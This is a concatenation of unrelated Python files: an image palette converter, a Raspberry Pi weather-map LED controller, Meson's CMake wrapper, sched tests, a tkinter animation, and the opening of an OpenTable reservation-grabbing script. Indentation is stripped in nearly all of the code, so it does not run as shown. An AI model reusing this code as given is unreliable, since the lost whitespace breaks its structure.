pixels = self.load_pixel_image(image)
is_rgba = (image.mode == 'RGBA')
if (parallel_threading == False):
self.converted_loop(is_rgba, pixels, original_pixels, image.size[0], image.size[1])
else:
step = ceil(image.size[0] / self.MAX_THREADS)
threads = []
for row in range(step, image.size[0] + step, step):
args = (is_rgba, pixels, original_pixels, row, image.size[1], row - step, 0)
t = threading.Thread(target=self.converted_loop, args=args)
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join(timeout=30)
if (self.USE_GAUSSIAN_BLUR == True):
image = image.filter(ImageFilter.GaussianBlur(1))
if (save_path != ''):
self.save_image_to_file(image, save_path)
return image
def save_image_to_file(self, image, path):
"""
Save a Pillow image to file
Parameters
----------
image : pillow image
The source pillow image
path : str
the path and the filename where to save the image
"""
image.save(path)
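# --- Illustrative usage (not part of the original module) ---
# A minimal sketch of how the GoNord class above can be driven; "input.jpg" and the
# output paths are placeholder names, and the snippet assumes the ImageGoNord package
# imported at the top of this file is installed.
if __name__ == '__main__':
    go_nord = GoNord()
    image = go_nord.open_image("input.jpg")
    # pixel-by-pixel replacement against the default Nord palette
    go_nord.convert_image(image, save_path="output-converted.jpg")
    # or quantize the whole image against the palette in one call
    go_nord.quantize_image(image, save_path="output-quantized.jpg")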
|
core.py
|
#!/usr/bin/env python
import enum
import requests
import logging
import logging.handlers
import os
import socket
import signal
import sys
import time
import threading
from configparser import ConfigParser
from rpi_ws281x import PixelStrip
from rpi_metar import cron, sources, encoder
from rpi_metar.airports import Airport, LED_QUEUE, MAX_WIND_SPEED_KTS, Legend
from rpi_metar import wx
from rpi_metar import leds as colors
from queue import Queue
log = logging.getLogger(__name__)
METAR_REFRESH_RATE = 5 * 60 # How often METAR data should be fetched, in seconds
WIND_DISPLAY_RATE = 5 # How often to show that it's windy, in seconds
LIGHTNING_STRIKE_RATE = 5 # How regularly should lightning strike, in seconds
FAILURE_THRESHOLD = 3 # How many times do we not get data before we reboot
ENCODER_QUEUE = Queue()
METAR_QUEUE = Queue()
ENCODER_EVENT = threading.Event()
METAR_EVENT = threading.Event()
# A collection of the airports we'll ultimately be tracking.
AIRPORTS = {}
def is_internet_up():
try:
response = requests.get('http://google.com', timeout=10.0)
response.raise_for_status()
except: # noqa
return False
return True
def fetch_metars(queue, cfg):
"""Fetches new METAR information periodically."""
failure_count = 0
# Load the desired data sources from the user configuration.
srcs = cfg.get('settings', 'sources', fallback='NOAA,NOAABackup,SkyVector').split(',')
srcs = [getattr(sources, src.strip()) for src in srcs]
while True:
metars = {}
# Allow duplicate LEDs by only using the first 4 chars as the ICAO. Anything else after it helps keep it unique.
airport_codes = set([code[:4] for code in AIRPORTS.keys()])
for source in srcs:
try:
data_source = source(list(airport_codes), config=cfg)
except: # noqa
log.exception('Unable to create data source.')
continue
try:
info = data_source.get_metar_info()
log.info('Retrieved: %s', info)
metars.update(info)
failure_count = 0
except: # noqa
log.exception('Failed to retrieve metar info.')
# We have retrieved METAR info, but did we get responses for all stations? If we did
# not, let's request those missing stations from the other sources. Perhaps they have
# the info!
airport_codes = airport_codes - set(metars.keys())
if not airport_codes:
# Nothing else needs to be retrieved
break
# We have exhausted the list of sources.
if not metars:
metars = None
# Some of the raspberry pis lose their wifi after some time and fail to automatically
# reconnect. This is a workaround for that case. If we've failed a lot, just reboot.
# We do need to make sure we're not rebooting too soon (as would be the case for
# initial setup).
failure_count += 1
# If other web services are available, it's just the NOAA site having problems so we
# don't need to reboot.
if failure_count >= FAILURE_THRESHOLD and not is_internet_up():
log.warning('Internet is not up, rebooting.')
os.system('reboot')
queue.put(metars)
time.sleep(cfg.getint('settings', 'metar_refresh_rate', fallback=METAR_REFRESH_RATE))
def process_metars(queue, leds):
"""Converts METAR info info Flight Categories and updates the LEDs."""
airports = AIRPORTS.values()
# When the system first starts up, waiting for all of the LEDs to fade into their correct
# colors can take a very long time. To mitigate this, we'll just slam the colors into place
# if this is the first time this thread is executing.
first = True
while True:
try:
metars = queue.get()
if metars is None:
for airport in airports:
airport.category = wx.FlightCategory.UNKNOWN
continue
for airport in airports:
airport.process_metar(metars)
if first:
leds.setPixelColor(airport.index, airport.category.value)
if first:
first = False
leds.show()
# Let the weather checkers know the info is refreshed
METAR_EVENT.set()
log.info(sorted(AIRPORTS.values(), key=lambda x: x.index))
except: # noqa
log.exception('metar processor error')
def render_leds(queue, leds, cfg):
"""Updates the LED strand when something pops onto the queue."""
while True:
log.info('waiting for queue.')
airport_code = queue.get()
log.info('got {}'.format(airport_code))
airport = AIRPORTS[airport_code.upper()]
# This is our target color.
color = airport.category.value
if not cfg.getboolean('settings', 'do_fade', fallback=True):
leds.setPixelColor(airport.index, color)
leds.show()
continue
# Let's try to fade to our desired color
start_color = leds.getPixelColor(airport.index)
start_g = start_color >> 16 & 0xff
start_r = start_color >> 8 & 0xff
start_b = start_color & 0xff
end_g = color >> 16 & 0xff
end_r = color >> 8 & 0xff
end_b = color & 0xff
with leds.lock: # Don't let lightning or wind interrupt us.
while((start_r != end_r) or (start_g != end_g) or (start_b != end_b)):
if start_r < end_r:
start_r += 1
elif start_r > end_r:
start_r -= 1
if start_g < end_g:
start_g += 1
elif start_g > end_g:
start_g -= 1
if start_b < end_b:
start_b += 1
elif start_b > end_b:
start_b -= 1
leds.setPixelColorRGB(airport.index, start_g, start_r, start_b)
leds.show()
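# Note on the fade above (explanatory, not from the original author): each colour
# channel moves by one step per iteration and leds.show() is called every step, so a
# fade between two arbitrary colours takes up to 255 iterations while holding
# leds.lock; the lightning and wind effects also take the lock before flashing, so
# they never interleave with a fade in progress.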
def lightning(leds, event, cfg):
"""Briefly changes LEDs to white, indicating lightning in the area."""
airports = AIRPORTS.values()
strike_duration = cfg.getfloat('settings', 'lightning_duration', fallback=1.0)
legend = cfg.getint('legend', 'lightning', fallback=None)
legend = [Legend('LIGHTNING', legend, wx.FlightCategory.OFF)] if legend is not None else []
while True:
# Which airports currently are experiencing thunderstorms
ts_airports = [airport for airport in airports if airport.thunderstorms] + legend
log.debug("LIGHTNING @: {}".format(ts_airports))
if ts_airports:
with leds.lock:
for airport in ts_airports:
leds.setPixelColor(airport.index, wx.FlightCategory.THUNDERSTORM.value)
leds.show()
time.sleep(strike_duration)
for airport in ts_airports:
leds.setPixelColor(airport.index, airport.category.value)
leds.show()
time.sleep(LIGHTNING_STRIKE_RATE - strike_duration)
else:
# Sleep until the next metar refresh...
event.wait(cfg.getint('settings', 'metar_refresh_rate', fallback=METAR_REFRESH_RATE))
event.clear()
def wind(leds, event, cfg):
"""Briefly changes LEDs to yellow, indicating it's too windy."""
airports = AIRPORTS.values()
indicator_duration = cfg.getfloat('settings', 'wind_duration', fallback=1.0)
legend = cfg.getint('legend', 'wind', fallback=None)
legend = [Legend('WIND', legend, wx.FlightCategory.OFF)] if legend is not None else []
while True:
# Which locations are currently breezy
windy_airports = [airport for airport in airports if airport.windy] + legend
log.debug('WINDY @: {}'.format(windy_airports))
if windy_airports:
# We want wind indicators to appear simultaneously.
with leds.lock:
for airport in windy_airports:
leds.setPixelColor(airport.index, wx.FlightCategory.WINDY.value)
leds.show()
time.sleep(indicator_duration)
for airport in windy_airports:
leds.setPixelColor(airport.index, airport.category.value)
leds.show()
time.sleep(WIND_DISPLAY_RATE - indicator_duration)
else:
event.wait(cfg.getint('settings', 'metar_refresh_rate', fallback=METAR_REFRESH_RATE))
event.clear()
def set_all(leds, color=colors.BLACK):
"""Sets all leds to a specific color."""
for i in range(leds.numPixels()):
leds.setPixelColor(i, color)
leds.show()
def load_configuration():
cfg_files = ['/etc/rpi_metar.conf', './rpi_metar.conf']
cfg = ConfigParser(converters={'color': colors.get_color})
cfg.read(cfg_files)
if 'megamap' in socket.gethostname():
cfg.set('settings', 'unknown_off', 'False')
with open('/etc/rpi_metar.conf', 'w') as f:
cfg.write(f)
# If we have redefined a color value (e.g. tweaked green a bit), or changed what should be displayed entirely (e.g.
# display ORANGE for LIFR), we need to rebuild the FlightCategory enum.
enum_needs_update = cfg.has_section('colors') or cfg.has_section('flight_categories')
# Load colors first so we can associate those to flight categories / behaviors
if cfg.has_section('colors'):
for color_name in cfg.options('colors'):
color_name = color_name.upper()
color_value = cfg.getcolor('colors', color_name)
# And the hacks begin. Set these newly defined colors in the module.
setattr(colors, color_name.upper(), color_value)
log.debug('Setting custom color: {} -> {}'.format(color_name, color_value))
# Now that colors should all be set, let's associate them to categories / behaviors
categories_to_colors = {
'VFR': colors.GREEN,
'IFR': colors.RED,
'LIFR': colors.MAGENTA,
'MVFR': colors.BLUE,
'UNKNOWN': colors.YELLOW,
'OFF': colors.BLACK,
'MISSING': colors.ORANGE,
'THUNDERSTORM': colors.WHITE,
'WINDY': colors.YELLOW,
}
if cfg.has_section('flight_categories'):
for category_name in cfg.options('flight_categories'):
category_name = category_name.upper()
if category_name not in categories_to_colors:
log.warning('{} is not a valid flight category, ignoring.'.format(category_name))
continue
color_value = cfg.getcolor('flight_categories', category_name)
log.debug('Overriding default color for {}, setting to: {}'.format(category_name, color_value))
categories_to_colors[category_name] = color_value
if enum_needs_update:
wx.FlightCategory = enum.Enum(
'FlightCategory',
categories_to_colors
)
max_wind_speed_kts = cfg.getint('settings', 'max_wind', fallback=MAX_WIND_SPEED_KTS)
unknown_off = cfg.getboolean('settings', 'unknown_off', fallback=True)
for code in cfg.options('airports'):
index = cfg.getint('airports', code)
AIRPORTS[code.upper()] = Airport(code, index, max_wind_speed_kts=max_wind_speed_kts, unknown_off=unknown_off)
return cfg
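# --- Illustrative /etc/rpi_metar.conf (assumed values, shown only to document the
# sections read by load_configuration() above) ---
#
# [settings]
# brightness = 128
# metar_refresh_rate = 300
# max_wind = 30
# do_fade = true
#
# [airports]
# kden = 0
# kbjc = 1
#
# [legend]
# vfr = 10
# ifr = 11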
def on_turn(delta):
"""Let the brightness adjustment thread be aware that it needs to do something."""
log.debug("on turn called.")
ENCODER_QUEUE.put(delta)
ENCODER_EVENT.set()
def adjust_brightness(leds, cfg):
while not ENCODER_QUEUE.empty():
delta = ENCODER_QUEUE.get() * 5
brightness = leds.getBrightness()
try:
leds.setBrightness(brightness + delta)
except OverflowError:
log.info('New brightness exceeds limits: {}'.format(brightness + delta))
else:
leds.show()
log.info('Set brightness to {}'.format(brightness + delta))
# Now that we've handled everything in the queue, write out the current brightness into the
# config file. This way it persists upon reboots / restarts, etc.
if 'settings' not in cfg:
cfg['settings'] = {}
cfg['settings']['brightness'] = str(leds.getBrightness())
with open('/etc/rpi_metar.conf', 'w') as f:
cfg.write(f)
log.info('Saved new brightness ({}) to cfg file.'.format(leds.getBrightness()))
# Indicate that we've handled the event.
ENCODER_EVENT.clear()
def wait_for_knob(event, leds, cfg):
while True:
try:
event.wait()
adjust_brightness(leds, cfg)
except:
log.exception('unexpected error')
def set_legend(leds, cfg):
"""Sets a few LEDs to fixed colors, for use with a legend."""
if not cfg.has_section('legend'):
return
for category in wx.FlightCategory:
index = cfg.getint('legend', category.name.casefold(), fallback=None)
if index is not None:
leds.setPixelColor(index, category.value)
log.info('Legend: set %s to %s.', index, category.name)
def get_num_leds(cfg):
"""Returns the number of LEDs as defined in the configuration file.
It takes into account that LEDs can be defined in both the 'airports' and 'legend' sections.
"""
airport_max = max((airport.index for airport in AIRPORTS.values()))
legend_max = 0
if cfg.has_section('legend'):
legend_max = max((int(v) for v in cfg['legend'].values()))
return max([airport_max, legend_max]) + 1
def main():
# Register the encoder to handle changing the brightness
knob = encoder.RotaryEncoder(callback=on_turn)
def on_exit(sig, frame):
knob.destroy()
set_all(leds, colors.BLACK)
sys.exit(0)
signal.signal(signal.SIGINT, on_exit)
signal.signal(signal.SIGTERM, on_exit)
cron.set_upgrade_schedule()
cfg = load_configuration()
kwargs = {
'num': get_num_leds(cfg),
'pin': 18,
'gamma': colors.GAMMA,
'brightness': int(cfg.get('settings', 'brightness', fallback=128))
}
# Sometimes if we use LED strips from different batches, they behave differently with the gamma
# controls and brightness levels. Therefore we need to be able to disable the gamma controls.
if cfg.getboolean('settings', 'disable_gamma', fallback=False):
kwargs.pop('gamma')
leds = PixelStrip(**kwargs)
leds.begin()
leds.lock = threading.Lock()
set_all(leds, wx.FlightCategory.UNKNOWN.value)
for airport in AIRPORTS.values():
leds.setPixelColor(airport.index, wx.FlightCategory.UNKNOWN.value)
set_legend(leds, cfg)
leds.show()
# Kick off a thread to handle adjusting the brightness
t = threading.Thread(name='brightness', target=wait_for_knob, args=(ENCODER_EVENT, leds, cfg))
t.start()
# A thread to fetch metar information periodically
t = threading.Thread(name='metar_fetcher', target=fetch_metars, args=(METAR_QUEUE, cfg))
t.start()
# A thread to process metar info.
t = threading.Thread(name='metar_processor', target=process_metars, args=(METAR_QUEUE, leds))
t.start()
# A thread to change the LEDs when airport categories change.
t = threading.Thread(name='render_leds', target=render_leds, args=(LED_QUEUE, leds, cfg))
t.start()
# A thread for lightning
if cfg.getboolean('settings', 'lightning', fallback=True):
t = threading.Thread(name='lightning', target=lightning, args=(leds, METAR_EVENT, cfg))
t.start()
# A thread for wind
if cfg.getboolean('settings', 'wind', fallback=True):
t = threading.Thread(name='wind', target=wind, args=(leds, METAR_EVENT, cfg))
t.start()
if __name__ == '__main__':
main()
|
executor.py
|
# Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
import subprocess as S
from pathlib import Path
from threading import Thread
import typing as T
import re
import os
from .. import mlog
from ..mesonlib import PerMachine, Popen_safe, version_compare, MachineChoice, is_windows, OptionKey
from ..programs import find_external_program, NonExistingExternalProgram
if T.TYPE_CHECKING:
from ..environment import Environment
from ..programs import ExternalProgram
TYPE_result = T.Tuple[int, T.Optional[str], T.Optional[str]]
TYPE_cache_key = T.Tuple[str, T.Tuple[str, ...], str, T.FrozenSet[T.Tuple[str, str]]]
class CMakeExecutor:
# The class's copy of the CMake path. Avoids having to search for it
# multiple times in the same Meson invocation.
class_cmakebin = PerMachine(None, None) # type: PerMachine[T.Optional[ExternalProgram]]
class_cmakevers = PerMachine(None, None) # type: PerMachine[T.Optional[str]]
class_cmake_cache = {} # type: T.Dict[T.Any, TYPE_result]
def __init__(self, environment: 'Environment', version: str, for_machine: MachineChoice, silent: bool = False):
self.min_version = version
self.environment = environment
self.for_machine = for_machine
self.cmakebin, self.cmakevers = self.find_cmake_binary(self.environment, silent=silent)
self.always_capture_stderr = True
self.print_cmout = False
self.prefix_paths = [] # type: T.List[str]
self.extra_cmake_args = [] # type: T.List[str]
if self.cmakebin is None:
return
if not version_compare(self.cmakevers, self.min_version):
mlog.warning(
'The version of CMake', mlog.bold(self.cmakebin.get_path()),
'is', mlog.bold(self.cmakevers), 'but version', mlog.bold(self.min_version),
'is required')
self.cmakebin = None
return
self.prefix_paths = self.environment.coredata.options[OptionKey('cmake_prefix_path', machine=self.for_machine)].value
if self.prefix_paths:
self.extra_cmake_args += ['-DCMAKE_PREFIX_PATH={}'.format(';'.join(self.prefix_paths))]
def find_cmake_binary(self, environment: 'Environment', silent: bool = False) -> T.Tuple[T.Optional['ExternalProgram'], T.Optional[str]]:
# Only search for CMake the first time and store the result in the class
# definition
if isinstance(CMakeExecutor.class_cmakebin[self.for_machine], NonExistingExternalProgram):
mlog.debug(f'CMake binary for {self.for_machine} is cached as not found')
return None, None
elif CMakeExecutor.class_cmakebin[self.for_machine] is not None:
mlog.debug(f'CMake binary for {self.for_machine} is cached.')
else:
assert CMakeExecutor.class_cmakebin[self.for_machine] is None
mlog.debug(f'CMake binary for {self.for_machine} is not cached')
for potential_cmakebin in find_external_program(
environment, self.for_machine, 'cmake', 'CMake',
environment.default_cmake, allow_default_for_cross=False):
version_if_ok = self.check_cmake(potential_cmakebin)
if not version_if_ok:
continue
if not silent:
mlog.log('Found CMake:', mlog.bold(potential_cmakebin.get_path()),
f'({version_if_ok})')
CMakeExecutor.class_cmakebin[self.for_machine] = potential_cmakebin
CMakeExecutor.class_cmakevers[self.for_machine] = version_if_ok
break
else:
if not silent:
mlog.log('Found CMake:', mlog.red('NO'))
# Set to False instead of None to signify that we've already
# searched for it and not found it
CMakeExecutor.class_cmakebin[self.for_machine] = NonExistingExternalProgram()
CMakeExecutor.class_cmakevers[self.for_machine] = None
return None, None
return CMakeExecutor.class_cmakebin[self.for_machine], CMakeExecutor.class_cmakevers[self.for_machine]
def check_cmake(self, cmakebin: 'ExternalProgram') -> T.Optional[str]:
if not cmakebin.found():
mlog.log(f'Did not find CMake {cmakebin.name!r}')
return None
try:
p, out = Popen_safe(cmakebin.get_command() + ['--version'])[0:2]
if p.returncode != 0:
mlog.warning('Found CMake {!r} but couldn\'t run it'
''.format(' '.join(cmakebin.get_command())))
return None
except FileNotFoundError:
mlog.warning('We thought we found CMake {!r} but now it\'s not there. How odd!'
''.format(' '.join(cmakebin.get_command())))
return None
except PermissionError:
msg = 'Found CMake {!r} but didn\'t have permissions to run it.'.format(' '.join(cmakebin.get_command()))
if not is_windows():
msg += '\n\nOn Unix-like systems this is often caused by scripts that are not executable.'
mlog.warning(msg)
return None
cmvers = re.search(r'(cmake|cmake3)\s*version\s*([\d.]+)', out).group(2)
return cmvers
def set_exec_mode(self, print_cmout: T.Optional[bool] = None, always_capture_stderr: T.Optional[bool] = None) -> None:
if print_cmout is not None:
self.print_cmout = print_cmout
if always_capture_stderr is not None:
self.always_capture_stderr = always_capture_stderr
def _cache_key(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_cache_key:
fenv = frozenset(env.items()) if env is not None else frozenset()
targs = tuple(args)
return (self.cmakebin.get_path(), targs, build_dir.as_posix(), fenv)
def _call_cmout_stderr(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.PIPE, cwd=str(build_dir), env=env) # TODO [PYTHON_37]: drop Path conversion
# stdout and stderr MUST be read at the same time to avoid pipe
# blocking issues. The easiest way to do this is with a separate
# thread for one of the pipes.
def print_stdout() -> None:
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
t = Thread(target=print_stdout)
t.start()
try:
# Read stderr line by line and log non trace lines
raw_trace = ''
tline_start_reg = re.compile(r'^\s*(.*\.(cmake|txt))\(([0-9]+)\):\s*(\w+)\(.*$')
inside_multiline_trace = False
while True:
line_raw = proc.stderr.readline()
if not line_raw:
break
line = line_raw.decode(errors='ignore')
if tline_start_reg.match(line):
raw_trace += line
inside_multiline_trace = not line.endswith(' )\n')
elif inside_multiline_trace:
raw_trace += line
else:
mlog.warning(line.strip('\n'))
finally:
proc.stderr.close()
t.join()
proc.wait()
return proc.returncode, None, raw_trace
def _call_cmout(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
cmd = self.cmakebin.get_command() + args
proc = S.Popen(cmd, stdout=S.PIPE, stderr=S.STDOUT, cwd=str(build_dir), env=env) # TODO [PYTHON_37]: drop Path conversion
while True:
line = proc.stdout.readline()
if not line:
break
mlog.log(line.decode(errors='ignore').strip('\n'))
proc.stdout.close()
proc.wait()
return proc.returncode, None, None
def _call_quiet(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
build_dir.mkdir(parents=True, exist_ok=True)
cmd = self.cmakebin.get_command() + args
ret = S.run(cmd, env=env, cwd=str(build_dir), close_fds=False,
stdout=S.PIPE, stderr=S.PIPE, universal_newlines=False) # TODO [PYTHON_37]: drop Path conversion
rc = ret.returncode
out = ret.stdout.decode(errors='ignore')
err = ret.stderr.decode(errors='ignore')
return rc, out, err
def _call_impl(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]]) -> TYPE_result:
mlog.debug(f'Calling CMake ({self.cmakebin.get_command()}) in {build_dir} with:')
for i in args:
mlog.debug(f' - "{i}"')
if not self.print_cmout:
return self._call_quiet(args, build_dir, env)
else:
if self.always_capture_stderr:
return self._call_cmout_stderr(args, build_dir, env)
else:
return self._call_cmout(args, build_dir, env)
def call(self, args: T.List[str], build_dir: Path, env: T.Optional[T.Dict[str, str]] = None, disable_cache: bool = False) -> TYPE_result:
if env is None:
env = os.environ.copy()
args = args + self.extra_cmake_args
if disable_cache:
return self._call_impl(args, build_dir, env)
# First check if cached, if not call the real cmake function
cache = CMakeExecutor.class_cmake_cache
key = self._cache_key(args, build_dir, env)
if key not in cache:
cache[key] = self._call_impl(args, build_dir, env)
return cache[key]
def found(self) -> bool:
return self.cmakebin is not None
def version(self) -> str:
return self.cmakevers
def executable_path(self) -> str:
return self.cmakebin.get_path()
def get_command(self) -> T.List[str]:
return self.cmakebin.get_command()
def get_cmake_prefix_paths(self) -> T.List[str]:
return self.prefix_paths
def machine_choice(self) -> MachineChoice:
return self.for_machine
|
test_sched.py
|
import queue
import sched
import time
import unittest
try:
import threading
except ImportError:
threading = None
TIMEOUT = 10
class Timer:
def __init__(self):
self._cond = threading.Condition()
self._time = 0
self._stop = 0
def time(self):
with self._cond:
return self._time
# increase the time but not beyond the established limit
def sleep(self, t):
assert t >= 0
with self._cond:
t += self._time
while self._stop < t:
self._time = self._stop
self._cond.wait()
self._time = t
# advance time limit for user code
def advance(self, t):
assert t >= 0
with self._cond:
self._stop += t
self._cond.notify_all()
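# Explanatory note (not from the original test file): Timer is a fake clock. The
# scheduler thread calls Timer.sleep(), which blocks on the condition variable until
# the main thread calls Timer.advance() to push self._stop past the requested time,
# so the concurrent tests below proceed deterministically instead of relying on
# wall-clock delays.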
class TestCase(unittest.TestCase):
def test_enter(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [0.5, 0.4, 0.3, 0.2, 0.1]:
z = scheduler.enter(x, 1, fun, (x,))
scheduler.run()
self.assertEqual(l, [0.1, 0.2, 0.3, 0.4, 0.5])
def test_enterabs(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
z = scheduler.enterabs(x, 1, fun, (x,))
scheduler.run()
self.assertEqual(l, [0.01, 0.02, 0.03, 0.04, 0.05])
@unittest.skipIfGraalPythonWitoutThreads
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_enter_concurrent(self):
q = queue.Queue()
fun = q.put
timer = Timer()
scheduler = sched.scheduler(timer.time, timer.sleep)
scheduler.enter(1, 1, fun, (1,))
scheduler.enter(3, 1, fun, (3,))
t = threading.Thread(target=scheduler.run)
t.start()
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 1)
self.assertTrue(q.empty())
for x in [4, 5, 2]:
z = scheduler.enter(x - 1, 1, fun, (x,))
timer.advance(2)
self.assertEqual(q.get(timeout=TIMEOUT), 2)
self.assertEqual(q.get(timeout=TIMEOUT), 3)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 4)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 5)
self.assertTrue(q.empty())
timer.advance(1000)
t.join(timeout=TIMEOUT)
self.assertFalse(t.is_alive())
self.assertTrue(q.empty())
self.assertEqual(timer.time(), 5)
def test_priority(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for priority in [1, 2, 3, 4, 5]:
z = scheduler.enterabs(0.01, priority, fun, (priority,))
scheduler.run()
self.assertEqual(l, [1, 2, 3, 4, 5])
def test_cancel(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
now = time.time()
event1 = scheduler.enterabs(now + 0.01, 1, fun, (0.01,))
event2 = scheduler.enterabs(now + 0.02, 1, fun, (0.02,))
event3 = scheduler.enterabs(now + 0.03, 1, fun, (0.03,))
event4 = scheduler.enterabs(now + 0.04, 1, fun, (0.04,))
event5 = scheduler.enterabs(now + 0.05, 1, fun, (0.05,))
scheduler.cancel(event1)
scheduler.cancel(event5)
scheduler.run()
self.assertEqual(l, [0.02, 0.03, 0.04])
@unittest.skipIfGraalPythonWitoutThreads
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_cancel_concurrent(self):
q = queue.Queue()
fun = q.put
timer = Timer()
scheduler = sched.scheduler(timer.time, timer.sleep)
now = timer.time()
event1 = scheduler.enterabs(now + 1, 1, fun, (1,))
event2 = scheduler.enterabs(now + 2, 1, fun, (2,))
event4 = scheduler.enterabs(now + 4, 1, fun, (4,))
event5 = scheduler.enterabs(now + 5, 1, fun, (5,))
event3 = scheduler.enterabs(now + 3, 1, fun, (3,))
t = threading.Thread(target=scheduler.run)
t.start()
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 1)
self.assertTrue(q.empty())
scheduler.cancel(event2)
scheduler.cancel(event5)
timer.advance(1)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 3)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 4)
self.assertTrue(q.empty())
timer.advance(1000)
t.join(timeout=TIMEOUT)
self.assertFalse(t.is_alive())
self.assertTrue(q.empty())
self.assertEqual(timer.time(), 4)
def test_empty(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
self.assertTrue(scheduler.empty())
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
z = scheduler.enterabs(x, 1, fun, (x,))
self.assertFalse(scheduler.empty())
scheduler.run()
self.assertTrue(scheduler.empty())
def test_queue(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
now = time.time()
e5 = scheduler.enterabs(now + 0.05, 1, fun)
e1 = scheduler.enterabs(now + 0.01, 1, fun)
e2 = scheduler.enterabs(now + 0.02, 1, fun)
e4 = scheduler.enterabs(now + 0.04, 1, fun)
e3 = scheduler.enterabs(now + 0.03, 1, fun)
# queue property is supposed to return an ordered list of
# upcoming events
self.assertEqual(scheduler.queue, [e1, e2, e3, e4, e5])
def test_args_kwargs(self):
seq = []
def fun(*a, **b):
seq.append((a, b))
now = time.time()
scheduler = sched.scheduler(time.time, time.sleep)
scheduler.enterabs(now, 1, fun)
scheduler.enterabs(now, 1, fun, argument=(1, 2))
scheduler.enterabs(now, 1, fun, argument=('a', 'b'))
scheduler.enterabs(now, 1, fun, argument=(1, 2), kwargs={"foo": 3})
scheduler.run()
self.assertCountEqual(seq, [
((), {}),
((1, 2), {}),
(('a', 'b'), {}),
((1, 2), {'foo': 3})
])
def test_run_non_blocking(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [10, 9, 8, 7, 6]:
scheduler.enter(x, 1, fun, (x,))
scheduler.run(blocking=False)
self.assertEqual(l, [])
if __name__ == "__main__":
unittest.main()
|
Rain_geometry.py
|
from tkinter import *
import random, threading, time, os
# initial vertical (y) coordinate of the raindrops
INIT_HEIGHT = 1
# create the raindrops
def rainmake(canvas, imagefile):
rainlist = []
for i in range(5):
# create a row of "Fu" (福) character images from the picture
rainlist.append(canvas.create_image(100 + 80 * i, INIT_HEIGHT, anchor=NE, image=imagefile))
return rainlist
# make the raindrops fall
def raindown(tk, canvas, imagefile, sec):
# stagger the threads: each one waits a different number of seconds before starting
time.sleep(sec)
rainlist = rainmake(canvas, imagefile)
# vertical coordinate of each "Fu" character (one entry per raindrop)
height = [INIT_HEIGHT] * 5
while True:
# pause briefly before each move
time.sleep(0.2)
# move all 5 "Fu" characters together
for i in range(5):
# if this "Fu" has already reached the bottom, do not move it again
if not height[i] == 0:
# set the falling step size
rnd = random.randint(5, 50)
canvas.move(rainlist[i], 0, rnd)
height[i] = height[i] + rnd
tk.update()
for i,h in enumerate(height):
if h > 400:
# once a "Fu" reaches the bottom, delete it
canvas.delete(rainlist[i])
tk.update()
# reset this "Fu"'s height
height[i] = 0
print(i,h,height)
# when all have reached the bottom, exit the loop
if height == [0] * 5:
print('break:',threading.current_thread().name)
break
def lookloop(tk, canvas, thread):
aliveflg = False
while True:
# check once every 5 seconds
time.sleep(5)
# the rain is still falling if any worker thread is alive
aliveflg = any(th.is_alive() for th in thread)
if aliveflg == False:
break
canvas.create_text(100 , 200, text='雨停了...', fill='red')
canvas.pack()
time.sleep(5)
tk.destroy()
def main():
# create the window
tk = Tk()
tk.title('送福雨')
canvas_style = {
'bg':'white',
'height':'500',
'width':'410',
'cursor':'circle'
}
# create the canvas
canvas = Canvas(tk,canvas_style)
canvas.pack()
# image asset
if not os.path.exists('pic.gif'):
raise Exception('pic.gif file does not exists.')
imagefile = PhotoImage(file = 'pic.gif')
thread = []
for i in range(100):
thread.append(threading.Thread(target=raindown, args=(tk, canvas, imagefile, i)))
for t in thread:
t.start()
# start another thread to monitor the running threads
threading.Thread(target=lookloop, args=(tk, canvas, thread)).start()
# enter the main event loop
tk.mainloop()
|
snippet.py
|
#! /usr/bin/env python
"""
Pounce on an open OpenTable reservation.
"""
import sys, os, time, re, mechanize, gtk, webkit, threading, random
rid = 1180 # OpenTable restaurant ID; 1180 = French Laundry
people_choices = [3, 3, 3, 4] # number of people to request for; cycles through choices
targetdate_spec = (5, 13, 2012, 7, 30, 00, 'PM') # (month, day, year, hour, minute, second, AM/PM); parsed below once parsedate() is defined
slop = 86400 # in seconds; = 1 day; default date tolerance
